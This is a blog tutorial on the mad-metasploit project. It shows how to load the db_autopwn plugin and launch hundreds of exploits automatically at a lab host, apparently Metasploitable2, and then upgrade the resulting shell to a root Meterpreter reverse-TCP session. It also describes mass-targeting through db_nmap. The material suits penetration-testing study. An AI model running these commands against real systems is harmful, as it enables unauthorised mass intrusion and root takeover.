My first english article on blog!
Please understand if I am wrong because English is not my native language.

This time is automation exploit with db_autopwn, mad-metasploit. Let’s start!


What is mad-metasploit, db_autopwn

mad-metasploit is my project related to metasploit framework
To sum up…

"Metasploit custom modules, plugins, resource script and.. awesome metasploit collection"

and db_autopwn is automation exploit plugin on metasploit-framework. but it is deprecated.. :(

I keeping db_autopwn source code on my github repo, and added to mad-metasploit project!
Now, let’s use Mad-Metasploit to launch an automated attack.

https://github.com/hahwul/mad-metasploit
https://github.com/hahwul/metasploit-autopwn

Install mad-metasploit

First, install(um.. clone github…) mad-metasploit project

clone repo and set config file.
$ git clone https://github.com/hahwul/mad-metasploit
$ cd mad-metasploit

vim config/config.rb
$metasploit_path = '/opt/metasploit-framework/embedded/framework/'
#                    /usr/share/metasploit-framework
#                   input your metasploit path

defined your msf path on config.rb


Second, patch mad-metasploit to metasploit-framekwork

The mad-metasploit supports two modes. Interactive Mode, Commandline Mode
But in fact, there is little difference between the two.(whether or not to set the pre-settings)

Interactive Mode
$ ./mad-metasploit

Commandline Mode(preset all)
$ ./mad-metasploit [-a/-y/--all/--yes]



At the end of this step, the module, plug-in of the mad-metasploit is installed in the metasploit-framework. If you need to delete it, you can remove it with the -r, --remove option.

Use db_autopwn on mad-metasploit

load db_autopwn.
Enter load mad-metasploit/db_autopwn command in msfconsole

HAHWUL > load mad-metasploit/db_autopwn
[*] Successfully loaded plugin: db_autopwn

completed!

db_autopwn is enabled in msfconsole.

Run db_autopwn for automation exploit

auto-exploit target. default command form is this
db_autopwn {target}

I added several options for a more meaningful test.
(db_autopwn options)
    -h          Display this help text
    -t          Show all matching exploit modules
    -x          Select modules based on vulnerability references
    -p          Select modules based on open ports
    -e          Launch exploits against all matched targets
    -r          Use a reverse connect shell
    -b          Use a bind shell on a random port (default)
    -q          Disable exploit module output
    -R  [rank]  Only run modules with a minimal rank
    -I  [range] Only exploit hosts inside this range
    -X  [range] Always exclude hosts inside this range
    -PI [range] Only exploit hosts with these ports open
    -PX [range] Always exclude hosts with these ports open
    -m  [regex] Only run modules whose name matches the regex
    -T  [secs]  Maximum runtime for any exploit in seconds

Enter command!

HAHWUL > db_autopwn -p -R great -e -q 192.168.56.101
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[*] (1/533 [0 sessions]): Launching exploit/freebsd/ftp/proftp_telnet_iac against 192.168.56.101:21...
[*] (2/533 [0 sessions]): Launching exploit/linux/ftp/proftp_sreplace against 192.168.56.101:21...
[*] (3/533 [0 sessions]): Launching exploit/linux/ftp/proftp_telnet_iac against 192.168.56.101:21...
[*] (4/533 [0 sessions]): Launching exploit/multi/ftp/wuftpd_site_exec_format against 192.168.56.101:21...
[*] (5/533 [0 sessions]): Launching exploit/unix/ftp/proftpd_133c_backdoor against 192.168.56.101:21...
[*] (6/533 [0 sessions]): Launching exploit/unix/ftp/vsftpd_234_backdoor against 192.168.56.101:21...
[*] (7/533 [0 sessions]): Launching exploit/windows/ftp/easyftp_cwd_fixret against 192.168.56.101:21...
[*] (8/533 [0 sessions]): Launching exploit/windows/ftp/easyftp_list_fixret against 192.168.56.101:21...
[*] (9/533 [0 sessions]): Launching exploit/windows/ftp/easyftp_mkd_fixret against 192.168.56.101:21...

....

[*]  >> autopwn module timeout from exploit/linux/http/pineapple_preconfig_cmdinject after 151.61710667610168 seconds
[*]  >> autopwn module timeout from exploit/linux/http/webcalendar_settings_exec after 150.63282704353333 seconds
[*]  >> autopwn module timeout from exploit/linux/http/trueonline_p660hn_v1_rce after 150.87934255599976 seconds
[*] (533/533 [1 sessions]): Waiting on 136 launched modules to finish execution...
[*]  >> autopwn module timeout from exploit/linux/http/sophos_wpa_sblistpack_exec after 151.77907156944275 seconds
[*]  >> autopwn module timeout from exploit/linux/http/pandora_fms_exec after 152.29020595550537 seconds`

I got a shell from exploit. let’s upgrade for a little more functionality.
Upgrade shell to meterpreter!

HAHWUL  > use post/multi/manage/shell_to_meterpreter
HAHWUL post(shell_to_meterpreter) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
HAHWUL post(shell_to_meterpreter) > set SESSION 2
SESSION => 2
HAHWUL post(shell_to_meterpreter) > run

[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.1:4433
[*] Sending stage (826872 bytes) to 192.168.56.101
[*] Meterpreter session 3 opened (192.168.56.1:4433 -> 192.168.56.101:48732) at 2019-03-01 23:40:14 +0900
[*] Command stager progress: 100.00% (736/736 bytes)
[*] Post module execution completed
HAHWUL post(shell_to_meterpreter) > 
HAHWUL post(shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Type                   Information                                                Connection
  --  ----                   -----------                                                ----------
  2   shell cmd/unix                                                                    192.168.56.1:38018 -> 192.168.56.101:19274 (192.168.56.101)
  3   meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain  192.168.56.1:4433 -> 192.168.56.101:48732 (192.168.56.101)

Nice!

If you use db and scan the band with db_nmap, the content is stored in db_host, which allows you to attempt attacks with multiple targets without specifying a host.

HAHWUL> db_nmap -PN {targets..}
HAHWUL> db_hosts
HAHWUL > db_autopwn -pb

Thank you for reading :)

댓글 2개:

  1. 실례가 안된다면 autopwn을 실습한 환경 정보들을 알 수 있을까요?? 꼭 부탁드립니다.

    답글삭제
    답글
    1. 실습한 환경정보라고 하면 대상이 되는 시스템을 말씀주신건가요?
      맞다고 생각하고 일단 댓글드려봅니다. 글 작성했을 때 아마 metasploitable2 였을거에요.

      참고: https://www.hahwul.com/2017/10/hacking-metasploitable2-feat-dbautopwn.html

      rapid7 에서 제공해주는 취약 환경이고, 가상 환경에 올려서 쓸 수 있도록 제공해주고 있어요.
      최신은 version3이고, 아래 깃에서 내용 참고해주시면 될 것 같습니다.
      https://github.com/rapid7/metasploitable3/wiki/Vulnerabilities

      혹시 더 필요한 정보 있으면 이야기주세요 (_ _)

      삭제